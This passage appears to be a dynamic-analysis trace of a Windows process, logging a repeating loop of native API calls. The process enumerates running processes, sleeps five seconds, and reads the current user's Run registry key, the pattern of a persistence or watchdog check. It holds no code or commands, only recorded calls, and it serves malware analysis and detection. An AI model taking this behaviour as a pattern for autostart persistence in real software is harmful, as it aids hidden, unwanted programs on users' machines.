RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.154] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.166] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.166] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.166] NtClose (Handle=0xec) returned 0x0 [0189.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.170] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.182] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.183] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.183] NtClose (Handle=0xec) returned 0x0 [0189.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.197] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.197] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.197] NtClose (Handle=0xec) returned 0x0 [0189.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.228] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.228] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.228] NtClose (Handle=0xec) returned 0x0 [0189.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.244] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.244] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.244] NtClose (Handle=0xec) returned 0x0 [0189.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.538] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.631] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.632] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.632] NtClose (Handle=0xec) returned 0x0 [0189.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.635] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.649] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.650] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.650] NtClose (Handle=0xec) returned 0x0 [0189.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.653] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.666] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.666] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.666] NtClose (Handle=0xec) returned 0x0 [0189.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.686] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.686] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.686] NtClose (Handle=0xec) returned 0x0 [0189.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.696] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.697] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.697] NtClose (Handle=0xec) returned 0x0 [0189.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.703] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.712] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.712] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.712] NtClose (Handle=0xec) returned 0x0 [0189.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.716] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.728] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.728] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.728] NtClose (Handle=0xec) returned 0x0 [0189.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.734] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.743] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.743] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.743] NtClose (Handle=0xec) returned 0x0 [0189.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.854] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 